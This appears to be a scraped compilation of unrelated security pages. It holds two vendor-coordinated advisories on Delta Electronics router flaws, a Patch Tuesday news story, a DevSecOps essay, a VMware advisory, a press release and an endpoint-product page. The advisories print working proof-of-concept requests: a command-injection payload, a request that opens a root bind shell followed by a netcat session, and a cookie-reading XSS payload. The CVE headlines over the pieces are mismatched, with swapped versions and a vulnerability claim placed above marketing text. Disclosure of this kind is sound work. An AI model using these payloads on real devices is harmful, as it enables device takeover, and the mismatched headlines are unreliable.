Delta Electronics DX-2100-L1-CN 2.42 is vulnerable to Cross Site Scripting (XSS) via lform/urlfilter.

**Title**: Multiple Vulnerabilities  
**Product**: Delta Electronics DX-2100-L1-CN  
**Vulnerable version**: V1.5.0.10  
**Fixed version**: V1.5.0.12  
**CVE**: CVE-2022-42140, CVE-2022-42141  
**Impact**: High  
**Homepage**: https://www.deltaww.com  
**Found**: 2022-08-01

_Delta Electronics DX-2100-L1-CN is prone to authenticated command injection and a stored cross-site scripting (XSS) vulnerability. The XSS vulnerability can be used to execute arbitrary commands in the context of a user’s browser. The command injection allows an attacker to execute system commands on the device itself.  
_

**Vendor description**

“Delta, founded in 1971, is a global provider of power and thermal management solutions. Its mission statement, “To provide innovative, clean and energy -efficient solutions for a better tomorrow,” focuses on addressing key environmental issues such as global climate change. As an energy-saving solutions provider with core competencies in power electronics and automation, Delta’s business categories include Power Electronics, Automation, and Infrastructure.”

Source: https://www.deltaww.com/en-US/about/aboutProfile

**Vulnerable versions**

DX-2100-L1-CN / V1.5.0.10

**Vulnerability overview**

1) Authenticated Command Injection (CVE-2022-42140)  
An authenticated command injection has been identified in the web configuration service of the device. It can be used to execute system commands on the OS from the device in the context of the user “root”. Therefore, a full compromization of the device is possible by having credentials for the web service only.

2) Stored Cross-Site Scripting (CVE-2022-42141)  
A stored cross-site scripting vulnerability has been identified in the function “net diagnosis” on the device’s web configuration service. This can be exploited in the context of a victim’s session.

**Proof of Concept****1) Authenticated Command Injection**

The parameter “diagnose\_address” contains the payload “;ls /;”, which basically prints the content of the root directory to the serial terminal of the device.

http://192.168.3.150/lform/net\_diagnose?action=diagnose&diagnose\_type=0&diagnose\_address=;ls%20/;

The output can be seen in the context of a virtualized firmware clone, as used to find this vulnerability, but is usually invisible to a customer. Therefore, a more visible payload may be commands that interact via the network, like “;ping 192.168.0.10;”. This command will ping a device on the corresponding IP address within the local network.

**2) Stored Cross-Site Scripting**

The following code prints the current cached cookies of a user’s session to the screen. The JavaScript code will be stored on the device permanently.

POST /lform/urlfilter?action=save HTTP/1.1  
Host: 192.168.3.150  
Accept: \*/\*  
Accept-Language: de,en-US;q=0.7,en;q=0.3  
Accept-Encoding: gzip, deflate  
Content-Type: application/x-www-form-urlencoded  
Content-Length: 190  
Connection: keep-alive  
Cookie: language=en\_US; userindex=1; loginexpire=1648630746607; session=30

lan\_ipaddr=192.168.5.5&lan\_netmask=255.255.255.0&src\_addr\_start=&src\_addr\_end=&editnum=0&bfilter\_urllist=0&url\_addr=<script>alert(document.cookie)</script>&src\_addr\_type=0&filter\_state=1

The vulnerability was manually verified on an emulated device by using the MEDUSA scalable firmware runtime (https://medusa.cyberdanube.com).

**Solution**

Update to firmware version V1.5.0.12.

**Workaround****Recommendation**

CyberDanube recommends Delta Electronics customers to upgrade the firmware to the latest version available.

**References****Contact Timeline**

*   2022-08-02: Contacting Delta Electronics.
*   2022-08-10: Vendor requested the advisory without encryption; Sent advisory to Delta Electronics.
*   2022-08-16: Security contact asked few questions regarding responsible disclosure; Sent answers.
*   2022-08-30: Asked for an update.
*   2022-09-01: Vendor responded, that they will need more time to resolve the issues; Provided additional 30 days (until 2022-11-02) for patching.
*   2022-10-11: Asked for an update.
*   2022-10-12: Vendor responded, that fixing will be done 2022-11-15; Shifted release date to this date.
*   2022-10-16: Vendor shifted release date again to 2022-11-18. Shifted advisory release date to the same day.
*   2022-10-17: Asked for an update regarding the release; No answer.
*   2022-10-18: Asked for an update and shifted release date to 2022-10-22.
*   2022-10-19: Vendor responded, that there were problems at releasing the patch. Contact stated, that the patch will delay until end of November.
*   2022-10-21: Asked vendor for a concrete release date; No answer.
*   2022-10-28: Announced advisory release date for 2022-10-30 to vendor.
*   2022-10-29: Found firmware patches with issue date 2022-11-25 on vendors website.
*   2022-10-30: Vendor confirmed fixes. Coordinated release of security advisory.

**Author**

Thomas Weber is co-founder and security researcher at CyberDanube in the field of embedded systems, (I)IoT and OT. He has uncovered numerous zero-day vulnerabilities and has published a large number of security advisories in the past. As part of his scientific work, he developed an emulation system for firmware – today the SaaS tool > MEDUSA < has emerged out of this. In the past he spoke at cyber security conferences such as HITB, BlackHat, IT-SECX, HEK.SI and OHM(international). Nowadays, he brings his competence and experience into security products.

CVE-2022-42141: [EN] Multiple Vulnerabilities in Delta Electronics DX-2100-L1-CN - CyberDanube

Delta Electronics DVW-W02W2-E2 1.5.0.10 is vulnerable to Command Injection via Crafted URL.

**Title**: Authenticated Command Injection  
**Product**: Delta Electronics DVW-W02W2-E2  
**Vulnerable version**: V2.42  
**Fixed version**: V2.5.2  
**CVE**: CVE-2022-42139  
**Impact**: High  
**Homepage**: https://www.deltaww.com  
**Found**: 2022-08-01

_Delta Electronics DVW-W02W2-E2 is prone to an authenticated command injection vulnerability. This vulnerability can be used to execute arbitrary commands on the device._

**Vendor description**

“Delta, founded in 1971, is a global provider of power and thermal management solutions. Its mission statement, “To provide innovative, clean and energy -efficient solutions for a better tomorrow,” focuses on addressing key environmental issues such as global climate change. As an energy-saving solutions provider with core competencies in power electronics and automation, Delta’s business categories include Power Electronics, Automation, and Infrastructure.”

Source: https://www.deltaww.com/en-US/about/aboutProfile

**Vulnerable versions****Vulnerability overview**

1) Authenticated Command Injection  
The web server of the device is prone to an authenticated command injection. It allows an attacker to gain full access to the underlying operating system of the device with all implications. If such a device is acting as key device in an industrial network, or controls various critical equipment via serial ports, more extensive damage in the corresponding network can be done by an attacker.

**Proof of Concept****1) Authenticated Command Injection**

The web server is prone to an authenticated command injection via POST parameters. This is only possible if the “timestamp” parameter is set correctly in the URL. The following proof-of-concept shows how to open a port binding shell on port 8889 with a “utelnetd” listener:

POST /apply.cgi?/MT\_ping.htm%20timestamp=$correct-timestamp$ HTTP/1.1  
Host: 192.168.3.148  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,\*/\*;q=0.8  
Accept-Language: de,en-US;q=0.7,en;q=0.3  
Accept-Encoding: gzip, deflate  
Content-Type: application/x-www-form-urlencoded  
Content-Length: 105  
Origin: http://192.168.3.148  
Connection: close  
Referer: http://192.168.3.148/MT\_ping.htm  
Cookie: xxid=1973719449  
Upgrade-Insecure-Requests: 1

submit\_flag=mt\_ping&hid\_ver1=&hid\_ser1=&hid\_comm1=&hid\_ver2=&hid\_ser2=&hid\_comm2=&destination=\`utelnetd%20-p%208889%20-l%20/bin/ash%20-d\`

For accessing the device, the command “netcat” can be used:

$ nc 192.168.3.150 8889  
����!����

BusyBox v1.4.2 (2016-08-18 22:45:41 EDT) Built-in shell (ash)  
Enter ‘help’ for a list of built-in commands.

/ #

The vulnerability was manually verified on an emulated device by using the MEDUSA scalable firmware runtime (https://medusa.cyberdanube.com).

**Solution**

Update to firmware version V2.5.2.

**Workaround****Recommendation**

CyberDanube recommends Delta Electronics customers to upgrade the firmware to the latest version available.

**References****Contact Timeline**

*   2022-08-02: Contacting Delta Electronics.
*   2022-08-10: Vendor requested the advisory without encryption; Sent advisory to Delta Electronics.
*   2022-08-16: Security contact asked few questions regarding responsible disclosure; Sent answers.
*   2022-08-30: Asked for an update.
*   2022-09-01: Vendor responded, that they will need more time to resolve the issues; Provided additional 30 days (until 2022-11-02) for patching.
*   2022-10-11: Asked for an update.
*   2022-10-12: Vendor responded, that fixing will be done 2022-11-15; Shifted release date to this date.
*   2022-10-16: Vendor shifted release date again to 2022-11-18. Shifted advisory release date to the same day.
*   2022-10-17: Asked for an update regarding the release; No answer.
*   2022-10-18: Asked for an update and shifted release date to 2022-10-22.
*   2022-10-19: Vendor responded, that there were problems at releasing the patch. Contact stated, that the patch will delay until end of November.
*   2022-10-21: Asked vendor for a concrete release date; No answer.
*   2022-10-28: Announced advisory release date for 2022-10-30 to vendor.
*   2022-10-29: Found firmware patches with issue date 2022-11-25 on vendors website.
*   2022-10-30: Vendor confirmed fixes. Coordinated release of security advisory.

**Author**

Thomas Weber is co-founder and security researcher at CyberDanube in the field of embedded systems, (I)IoT and OT. He has uncovered numerous zero-day vulnerabilities and has published a large number of security advisories in the past. As part of his scientific work, he developed an emulation system for firmware – today the SaaS tool > MEDUSA < has emerged out of this. In the past he spoke at cyber security conferences such as HITB, BlackHat, IT-SECX, HEK.SI and OHM(international). Nowadays, he brings his competence and experience into security products.

CVE-2022-42139: [EN] Authenticated Command Injection in Delta Electronics DVW-W02W2-E2 - CyberDanube

Here's what you need to patch now, including six critical updates for Microsoft's final Patch Tuesday of the year.

Microsoft has released fixes for 48 new vulnerabilities across its products, including one that attackers are actively exploiting and another that has been publicly disclosed but is not under active exploit now.

Six of the vulnerabilities that the company patched in its final monthly security update for the year are listed as critical. It assigned an important severity rating to 43 vulnerabilities and gave three flaws a moderate severity assessment. 

Microsoft's update includes patches for out-of-band CVEs it addressed over the past month, plus 23 vulnerabilities in Google's Chromium browser technology, on which Microsoft's Edge browser is based.

**Actively Exploited Security Bug**

The flaw that attackers are actively exploiting (CVE-2022-44698) is not among the more critical of the bugs for which Microsoft released patches today. The flaw gives attackers a way to bypass the Windows SmartScreen security feature for protecting users against malicious files downloaded from the Internet. 

"An attacker can craft a malicious file that would evade Mark of the Web (MOTW) defenses, resulting in a limited loss of integrity and availability of security features such as Protected View in Microsoft Office, which rely on MOTW tagging," Microsoft said.

CVE-2022-44698 presents only a relatively small risk for organizations, says Kevin Breen, director of cyber-threat research at Immersive Labs. "It has to be used in partnership with an executable file or other malicious code like a document or script file," Breen says. "In these situations, this CVE bypasses some of Microsoft's built-in reputation scanning and detection — namely SmartScreen, which would normally pop up to tell a user the file may not be safe." 

At the same time, users should not underestimate the threat and should patch the issue quickly, Breen recommends.

Microsoft described another flaw — an elevation of privilege issue in the DirectX Graphics kernel — as a publicly known zero-day but not under active exploit. The company assessed the vulnerability (CVE-2022-44710) as being "Important" in severity and one that would allow an attacker to gain system-level privileges if exploited. However, the company described the flaw as one that attackers are less likely to exploit.

**Vulnerabilities to Patch Now**

Trend Micro's ZDI flagged three other vulnerabilities in the December Patch Tuesday security update as being significant: CVE-2022-44713, CVE-2022-41076, and CVE-2022-44699.

CVE-2022-44713 is a spoofing vulnerability in Microsoft Outlook for Mac. The vulnerability allows an attacker to appear as a trusted user and cause a victim to mistake an email message as if it came from a legitimate user. 

"We don't often highlight spoofing bugs, but anytime you're dealing with a spoofing bug in an email client, you should take notice," ZDI's head of threat awareness Dustin Childs said in a blog post. The vulnerability could prove especially troublesome when combined with the aforementioned SmartScreen MoTW bypass flaw that attackers are actively exploiting, he said.

CVE-2022-41076 is a PowerShell remote code execution (RCE) vulnerability that allows an authenticated attacker to escape the PowerShell Remoting Session Configuration and run arbitrary commands on an affected system, Microsoft said. 

The company assessed the vulnerability as something that attackers are more likely compromise, even though attack complexity itself is high. According to Childs, organizations should pay attention the vulnerability because it is the type of flaw that attackers often exploit when looking to "live off the land" after gaining initial access on a network. 

"Definitely don’t ignore this patch," Childs wrote.

And finally, CVE-2022-44699 is another security bypass vulnerability — this time in Azure Network Watcher Agent — that, if exploited, could affect an organization's ability to capture logs needed for incident response. 

"There might not be many enterprises relying on this tool, but for those using this \[Azure Network Watcher\] VM extension, this fix should be treated as critical and deployed quickly,' Childs said.

Researchers with Cisco Talos identified three other vulnerabilities as critical and issues that organizations need to address immediately. One of them is CVE-2022-41127, an RCE vulnerability that affects Microsoft Dynamics NAV and on-premises versions of Microsoft Dynamics 365 Business Central. A successful exploit could allow an attacker to execute arbitrary code on servers running Microsoft's Dynamics NAV ERP application, Talos researchers said in a blog post. 

The other two vulnerabilities that the vendor considers to be of high importance are CVE-2022-44670 and CVE-2022-44676, both of which are RCE flaws in the Windows Secure Socket Tunneling Protocol (SSTP). 

"Successful exploitation of these vulnerabilities requires an attacker to win a race condition but could enable an attacker to remotely execute code on RAS servers," according to Microsoft's advisory.

Among the vulnerabilities that the SANS Internet Storm Center identified as important are (CVE-2022-41089), an RCE in the .NET Framework, and (CVE-2022-44690) in Microsoft SharePoint Server.

In a blog post, Mike Walters, vice president of vulnerability and threat research at Action1 Corp., also pointed to a Windows Print Spooler elevation of privilege vulnerability (CVE-2022-44678), as another issue to watch. 

"The newly resolved CVE-2022-44678 is most likely to be exploited, which is probably true because Microsoft fixed another zero-day vulnerability related to Print Spooler last month," Walters said. "The risk from CVE-2022-44678 is the same: an attacker can get SYSTEM privileges after successful exploitation — but only locally."

**A Confusing Bug Count**

Interestingly, several vendors had different takes on the number of vulnerabilities that Microsoft patched this month. ZDI, for instance, assessed that Microsoft patched 52 vulnerabilities; Talos pegged the number at 48, SANS at 74, and Action1 initially had Microsoft patching 74, before revising it down to 52.

Johannes Ullrich, dean of research for the SANS Technology Institute, says the issue has to do with the different ways one can count the vulnerabilities. Some, for instance, include Chromium vulnerabilities in their count while others do not. 

Others, like SANS, also include security advisories that sometimes accompany Microsoft updates as vulnerabilities. Microsoft also sometimes releases patches during the month, which it also includes in the following Patch Tuesday update, and some researchers don't count these. 

"The patch count can sometimes be confusing, as the Patch Tuesday cycle is technically November to December, so this will also include patches that were released out of band earlier in the month, and can also include updates from third party vendors," Breen says. "The most notable of these are patches from Google from Chromium, which is the base for Microsoft's Edge browser."  
Breen says by his count there are 74 vulnerabilities patched since the last Patch Tuesday in November. This includes 51 from Microsoft and 23 from Google for the Edge browser. 

"If we exclude both the out-of-band and Google Chromium \[patches\], 49 patches for vulnerabilities were released today," he says.

A Microsoft spokesman says the number of new CVEs for which the company issued patches today was 48.

Microsoft Squashes Zero-Day, Actively Exploited Bugs in Dec. Update

Software teams can now fix bugs faster with faster release cycles, but breach pressure is increasing. Using SBOM and automation will help better detect, prevent, and remediate security issues throughout the software development life cycle.

Rapid development and deployment cycles have long been criticized for the potential to introduce more flaws in software. But the "move fast and break things" adage doesn't hold up in modern environments, which are increasingly being targeted by malicious actors. On the other hand, faster release cycles can also mean patches can be implemented faster — and this is just one factor that is accelerating the rate at which software teams can fix bugs.

As demand for reliable, secure software increases, a number of tactics and technologies have emerged to help teams build, maintain, fix, and secure their applications faster than ever. Approaches such as DevSecOps, bug bounty programs, open source bug reporting, and even Google's Project Zero have had substantial influence on how we secure software. But if identifying and patching vulnerabilities has become easier, why are we still reading about so many breaches? Let's explore.

**New Tactics Accelerate Bug Fixing**

The wide adoption of DevOps solutions and organization workflows, which we've seen in recent years, means faster release cycles of software. In the not-so-distant past, a software company would release an updated version every few months, which would contain fixes for security issues detected and patched in that period. Anything that wasn't yet discovered or fixed would have to wait for the next release in another few months. With DevOps methodology and technology in place, software vendors and open source project maintainers release versions of their product dozens of times a day — when the fix is ready, the product receives it, cutting the time-to-fix dramatically.

Some organizations are going a step further to implement security into development processes. Research from ESG shows that 62% of organizations have a plan or are evaluating use cases for DevSecOps implementation. And those organizations that have already put these processes into place are seeing radical improvements in the speed at which they can identify and remediate vulnerabilities.

Bug bounty programs have also become mainstream. Some platforms allow software vendors to use the power of crowdsourcing to discover security issues in their own products. This flow must be managed with a dedicated framework for bug fixing. And as the discovery of issues grows, the organization is compelled to create better ways to fix them, and the time-to-fix is getting shorter.

Within the open source community, code management solutions such as GitHub, GitLab, and others have a built-in way to report and track security issues so that open source maintainers and users can easily report and follow vulnerabilities that are presented in an open source project. The information is public (on the public projects), and the maintainers and the community feel committed to fixing issues quickly.

A final factor is the impact made by Google's Project Zero. As part of this initiative, Google has a team of security researchers dedicated to studying zero-day vulnerabilities in the hardware and software systems that are depended upon by users around the world. In 2021, Google's Project Zero detected a record 58 zero-day vulnerabilities in the wild.

In addition, most software companies that are presented in Project Zero's data set aren't your ordinary software vendors, and the project forces these major tech companies to fix security issues within 90 days, which results in shifts in engineering culture and organizational structure as the engineering community at large emulates the big innovators.

**Challenges Remain, Affecting Software Security**

Patches for software are often delivered via updates that require a consumer to upgrade to the latest version, a move which can often impact operations. Resolution in a timely manner can even be impossible, in some cases. Companies developing software today are often relying on a high percentage of open source code and many components that create complexity. Upgrading an open source library, which a company relies on throughout its codebase, or a specific version of a docker image, could mean substantial changes across its products. A single security fix might create a massive amount of work for engineering teams. As a result, teams must prioritize bug fixes, and only critical security issues are getting resolved.

**Improvements in Software Security**

Automation is key. It's impossible for software consumers and vendors to deal with a large amount of security risk in large codebases without using an automated process for detection, remediation, and prevention. Prioritizing is also important. A small engineering team could easily find itself overwhelmed with all the potential security issues disclosed, but it usually doesn't affect its software. To determine if applications are affected by security risks, companies need to take a comprehensive approach — from source code, throughout the DevOps pipelines releasing it, and through the production environment in the cloud. Connecting those dots helps engineers properly manage security risks in apps.

Companies should also employ technologies to assess the health and reputation of open source code. Factors to evaluate include quality, maintainability, popularity, and risk for supply-chain incidents. Automated security tools can play a role here as well by preventing risky code from entering the codebase and notifying developers of potentially dangerous packages. Also, employing a software bill of materials (SBOM) can provide transparency into the software components used in applications, accelerate the identification and remediation of potential vulnerabilities, and help achieve compliance with government regulations.

Accelerating Vulnerability Identification and Remediation

VMware ESXi contains a heap-overflow vulnerability. A malicious local actor with restricted privileges within a sandbox process may exploit this issue to achieve a partial information disclosure.

Advisory ID: VMSA-2022-0030

CVSSv3 Range: 4.2-7.5

Issue Date: 2022-12-08

Updated On: 2022-12-08 (Initial Advisory)

CVE(s): CVE-2022-31696, CVE-2022-31697, CVE-2022-31698, CVE-2022-31699

Synopsis: VMware ESXi and vCenter Server updates address multiple security vulnerabilities (CVE-2022-31696, CVE-2022-31697, CVE-2022-31698, CVE-2022-31699)

****1\. Impacted Products****

*   VMware ESXi
*   VMware vCenter Server (vCenter Server)  
    
*   VMware Cloud Foundation (Cloud Foundation)  
    

****2\. Introduction****

Multiple vulnerabilities in VMware ESXi and vCenter Server were privately reported to VMware. Updates are available to remediate these vulnerabilities in affected VMware products.

****3a. VMware ESXi memory corruption vulnerability (CVE-2022-31696)****

VMware ESXi contains a memory corruption vulnerability that exists in the way it handles a network socket. VMware has evaluated the severity of this issue to be in the Important severity range with a maximum CVSSv3 base score of 7.5.

A malicious actor with local access to ESXi may exploit this issue to corrupt memory leading to an escape of the ESXi sandbox.

To remediate CVE-2022-31696 apply the patches listed in the 'Fixed Version' column of the 'Response Matrix' found below.

VMware would like to thank Reno Robert of Trend Micro Zero Day Initiative for reporting this issue to us.

\[1\] ESXi 6.7 and 6.5 have reached end-of-life. Fixed versions documented in the response matrix were released before the end-of-life date.

Product

Version

Running On

CVE Identifier

CVSSv3

Severity

Fixed Version

Workarounds

Additional Documentation

ESXi

8.0

Any

CVE-2022-31696

N/A

N/A

Not impacted

N/A

N/A

ESXi

7.0

Any

CVE-2022-31696

7.5

important

ESXi70U3si-20841705

None

None

ESXi

6.7

Any

CVE-2022-31696

7.5

important

\[1\] ESXi670-202210101-SG

None

None

ESXi

6.5

Any

CVE-2022-31696

7.5

important

\[1\] ESXi650-202210101-SG

None

None

**Impacted Product Suites that Deploy Response Matrix 3a Components:**

Product

Version

Running On

CVE Identifier

CVSSv3

Severity

Fixed Version

Workarounds

Additional Documentation

Cloud Foundation (ESXi)

4.x

Any

CVE-2022-31696

7.5

important

KB90336

None

None

Cloud Foundation (ESXi)

3.x

Any

CVE-2022-31696

7.5

important

KB90336

None

None

****3b. VMware vCenter Server information disclosure vulnerability (CVE-2022-31697)****

The vCenter Server contains an information disclosure vulnerability due to the logging of credentials in plaintext. VMware has evaluated the severity of this issue to be in the Moderate severity range with a maximum CVSSv3 base score of 6.2.

A malicious actor with access to a workstation that invoked a vCenter Server Appliance ISO operation (Install/Upgrade/Migrate/Restore) can access plaintext passwords used during that operation.

To remediate CVE-2022-31697 apply the updates listed in the 'Fixed Version' column of the 'Response Matrix' below to affected deployments.

VMware would like to thank Zachary Kern-Wies for reporting this vulnerability to us.

\[1\] vCenter Server 6.7 and 6.5 have reached end-of-life. Fixed versions documented in the response matrix were released before the end-of-life date.

Product

Version

Running On

CVE Identifier

CVSSv3

Severity

Fixed Version

Workarounds

Additional Documentation

vCenter Server

8.0

Any

CVE-2022-31697

N/A

N/A

Not impacted

N/A

N/A

vCenter Server

7.0

Any

CVE-2022-31697

6.2

moderate

7.0 U3i

None

None

vCenter Server

6.7

Any

CVE-2022-31697

6.2

moderate

\[1\] 6.7.0 U3s

None

None

vCenter Server

6.5

Any

CVE-2022-31697

6.2

moderate

\[1\] 6.5 U3u

None

None

**Impacted Product Suites that Deploy Response Matrix 3b Components:**

Product

Version

Running On

CVE Identifier

CVSSv3

Severity

Fixed Version

Workarounds

Additional Documentation

Cloud Foundation (vCenter Server)

4.x

Any

CVE-2022-31697

6.2

moderate

KB90336

None

None

Cloud Foundation (vCenter Server)

3.x

Any

CVE-2022-31697

6.2

moderate

KB90336

None

None

****3c. VMware vCenter Server content library denial of service vulnerability (CVE-2022-31698)****

The vCenter Server contains a denial-of-service vulnerability in the content library service. VMware has evaluated the severity of this issue to be in the Moderate severity range with a maximum CVSSv3 base score of 5.8.

A malicious actor with network access to port 443 on vCenter Server may exploit this issue to trigger a denial-of-service condition by sending a specially crafted header.  

To remediate CVE-2022-31698 apply the updates listed in the 'Fixed Version' column of the 'Response Matrix' below to affected deployments.

VMware would like to thank Marcin 'Icewall' Noga of Cisco Talos for reporting this issue to us.

\[1\] vCenter Server 6.7 and 6.5 have reached end-of-life. Fixed versions documented in the response matrix were released before the end-of-life date.

Product

Version

Running On

CVE Identifier

CVSSv3

Severity

Fixed Version

Workarounds

Additional Documentation

vCenter Server

8.0

Any

CVE-2022-31698

N/A

N/A

Not impacted

N/A

N/A

vCenter Server

7.0

Any

CVE-2022-31698

5.8

moderate

7.0 U3i

None

None

vCenter Server

6.7

Any

CVE-2022-31698

5.8

moderate

\[1\] 6.7.0 U3s

None

None

vCenter Server

6.5

Any

CVE-2022-31698

5.8

moderate

\[1\] 6.5 U3u

None

None

**Impacted Product Suites that Deploy Response Matrix 3c Components:**

Product

Version

Running On

CVE Identifier

CVSSv3

Severity

Fixed Version

Workarounds

Additional Documentation

Cloud Foundation (vCenter Server)

4.x

Any

CVE-2022-31698

5.8

moderate

KB90336

None

None

Cloud Foundation (vCenter Server)

3.x

Any

CVE-2022-31698

5.8

moderate

KB90336

None

None

****3d. VMware ESXi OpenSLP heap overflow vulnerability (CVE-2022-31699)****

VMware ESXi contains a heap-overflow vulnerability. VMware has evaluated the severity of this issue to be in the Moderate severity range with a maximum CVSSv3 base score of 4.2.

A malicious local actor with restricted privileges within a sandbox process may exploit this issue to achieve a partial information disclosure.

To remediate CVE-2022-31699 apply the patches listed in the 'Fixed Version' column of the 'Response Matrix' found below.

VMware would like to thank 01dwang & bibi from Bugab00 team for reporting this issue to us.

**Impacted Product Suites that Deploy Response Matrix 3d Components:**

Product

Version

Running On

CVE Identifier

CVSSv3

Severity

Fixed Version

Workarounds

Additional Documentation

Cloud Foundation (ESXi)

4.x

Any

CVE-2022-31699

4.2

moderate

KB90336

KB76372

None

Cloud Foundation (ESXi)

3.x

Any

CVE-2022-31699

4.2

moderate

KB90336

KB76372

None

****4\. References****

****5\. Change Log****

**2022-12-08 VMSA-2022-0030  
**Initial security advisory.

****6\. Contact****

CVE-2022-31699: VMSA-2022-0030

Enterprises can now adopt the industry's most comprehensive Zero Trust Network Access 2.0 to secure access to all applications from any device.

**SANTA CLARA, Calif.****,** **Dec. 13, 2022** **/PRNewswire/ —** In a world where work is now an activity not a place, organizations need to connect a distributed workforce without compromising on security and user experience. Palo Alto Networks (NASDAQ: PANW), the global cybersecurity leader, today announced an expanded partnership that brings together BeyondCorp Enterprise from Google Cloud and Prisma® Access from Palo Alto Networks to provide hybrid users secure and seamless access to applications - SaaS, cloud or on-premise - from managed or unmanaged devices.

Built on the backbone of the Google Cloud network, this comprehensive cloud-delivered Zero Trust Network Access (ZTNA) 2.0 solution enables all users to work securely from anywhere regardless of device type. With Prisma Access, customers get superior ZTNA 2.0 security for all devices, branch offices and applications. BeyondCorp Enterprise Essentials enables secure access to applications and resources for unmanaged devices. Combined threat intelligence and machine learning (ML) automatically detects and remediates threats to users, applications or enterprise data; all powered by the superior performance, planetary reach, and low-latency connections of Google Cloud.

"Legacy VPN and Zero Trust Network Access (ZTNA) 1.0 solutions provide access to users that is too broad and lacks continuous security inspection, putting cloud-first and hybrid organizations at risk," said Kumar Ramchandran, SVP, Products for Palo Alto Networks. "ZTNA 2.0 by Palo Alto Networks secures the modern hybrid enterprise. This partnership will allow organizations to benefit from the performance, scale, and reliability offered by Google Cloud's global network, coupled with the security expertise of Palo Alto Networks" 

"Together with Prisma Access and BeyondCorp, customers will now have seamless access to a Zero Trust security solution built for today's workforce, powered by Google Cloud's innovation, scale, and trusted cloud infrastructure," said Sunil Potti, VP/GM, Cloud Security at Google Cloud. "At Google Cloud, we continue to deliver opinionated solutions with our customers' needs in mind, bringing together innovations from across Google and its ecosystem of partners in easy-to-consume offerings that are backed by Google's unique scale and deep experience."

Palo Alto Networks Prisma Access platform helps transform networking and security to deliver a true Zero Trust that supports both managed and unmanaged devices while delivering consistent protections across the entire enterprise. The industry's only ZTNA 2.0 solution provides deep and ongoing inspection of all application traffic, even for allowed connections to prevent all threats, including zero-day threats, providing secure access for data centers, branch offices and mobile users. Prisma Access is purpose-built on Google's global backbone to secure enterprises at cloud scale.

BeyondCorp Enterprise is based on Google's years of experience with zero trust and provides organizations with a seamless and secure experience for anyone who needs to access applications, cloud resources, and private data hosted on Google Cloud, in third-party clouds, or on-premises. BeyondCorp Enterprise leverages Chrome to provide a secure enterprise browsing solution where agents cannot be installed on devices, providing a simple, yet secure zero trust approach for unmanaged devices.

**About Palo Alto Networks**

Palo Alto Networks, the global cybersecurity leader, is shaping the cloud-centric future with technology that is transforming the way people and organizations operate. Our mission is to be the cybersecurity partner of choice, protecting our digital way of life. We help address the world's greatest security challenges with continuous innovation that seizes the latest breakthroughs in artificial intelligence, analytics, automation, and orchestration. By delivering an integrated platform and empowering a growing ecosystem of partners, we are at the forefront of protecting tens of thousands of organizations across clouds, networks, and mobile devices. Our vision is a world where each day is safer and more secure than the one before. For more information, visit www.paloaltonetworks.com.

Google Cloud and Palo Alto Networks Team to Protect the Modern Workforce

WithSecure DeepGuard 6 allows attackers to affect confidentiality, availability, and/or integrity.

**WithSecure™ Client Security**

Proven business protection and security for computers

1.  Home
2.  Solutions
3.  Software and services
4.  Business Suite
5.  Client Security

**Secure your business with the best in endpoint protection.**

**Client Security is much more than anti-malware – it offers next-gen protection elements such as threat intelligence, behavioral analysis and proactive protection against all the latest threats.**

Client Security is a business security product that offers you the best security for your business endpoints – continuously, year after year.

**Why WithSecure™ Client Security?**

Windows

**Award-winning**

Get award-winning, multi-layered security for desktops and laptops

**Protection engine**

Stay safe against zero-day vulnerabilities with DeepGuard, our proactive on-host protection engine

**Automatic patches**

Get centrally managed, automatic patches to your software to protect it against known vulnerabilities

**Performance**

Enjoy complete protection with minimal impact on system performance

**Automatically Augmented Security**

Enjoy automatically augmented security for online banking and other business-critical transactions

**Protection technologies**

Benefit from protection technologies powered by next-generation threat intelligence, advanced machine learning techniques, and highly skilled cyber security experts

Mac

**WithSecure Security Cloud**

Global protection against emerging threats within 60 seconds of initial detection

**Advanced anti-malware**

Anti-malware with real-time reputation checks for the latest threats

**Banking protection**

Provides added security for online banking

**Browsing protection**

Allows users to safely work and browse online without limiting them

**Firewall**

Utilizes Mac's own firewall to control incoming connections

“By achieving nearly 100% protection in all certification tests AV-Test performed in 2016, Client Security has proven to be a leader in protection of businesses.”

_Maik Morgenstern, CTO, AV-TEST GmbH_

**Your benefits**

Don't compromise on business security.

Client Security provides the best continuous protection available for Windows desktops and laptops. It is uniquely able to provide impenetrable protection against all online threats while minimizing the impact on system performance.

Endpoint protection is at the core of cyber security, and this is the best of the best. Complete endpoint protection is just the beginning. Client Security also saves you time with automatic patch management and boosts employee productivity with web browsing controls.

**1****No business downtimes**

No business downtime with the best, uncompromising, consistent security for desktops and laptops

**2****Application Control**

Avoid unsecure applications that put your business at risk with Application Control

**3****Web Content Control**

Work securely and productively with Web Content Control

**4****Connection Control**

Superior security for your business-critical work through automated Connection Control

**5****Software Updater**

Less opportunities for attackers with automated, up-to-date security with Software Updater

**Product features**

Standard

**Deepguard 6**

Behavior-based protection to keep your business safe against new and emerging threats

**Multi-engine Anti-malware**

Get unmatched protection against viruses, Trojans, rootkits, and other malware

**WithSecure Security Cloud**

Gain immediate protection against emerging threats discovered worldwide

**Browsing protection**

Ensure safe and efficient online work

**Advanced firewall**

Guard against malicious network activities

**Device control**

Prevent malware infections via USB

**Advanced protection**

Gain advanced protection against selected file types from unknown sites

**Botnet blocker**

Stop external control of compromised assets

Premium

**Connection control**

Prevent confidential information from being compromised

**Web content control**

Avoid legal risks and exposure to malicious content

**Patch management**

Automatic patch management for Windows operating system and third-party software

**Dataguard**

Provides additional protection against ransomware, and prevents the destruction and tampering of data

**Application control**

Blocks execution of applications and scripts according to rules created by our penetration testers, or as defined by the administrator

**Looking for product support?**

Find latest articles, instructions and other important support materials.

**Product details**

Malware and Spyware Protection

**Superior malware protection**

Our computer security component utilizes our multi-engine security platform to detect and prevent malware. It offers superior protection to traditional signature-based technologies:

*   Detects a broader range of malicious features, patterns and trends, enabling more reliable and accurate detections, even for previously unseen malware variants
*   By using real-time look-ups from the WithSecure Security Cloud, it can react faster to new and emerging threats in addition to ensuring a small footprint
*   Emulation enables detection of malware that utilize obfuscation techniques, and offers another layer of security before a file is run

DeepGuard 6

**Heuristic & behavior analysis**

DeepGuard combines some of our most advanced security technologies. It's the final and most critical layer of defense against new threats—even those that target previously unknown vulnerabilities.

DeepGuard observes application behavior and proactively intercepts any potentially harmful action on-the-fly before it causes damage. By switching the focus from signature characteristics to malicious behavior patterns, DeepGuard can identify and block malware even before a sample has been acquired and examined.

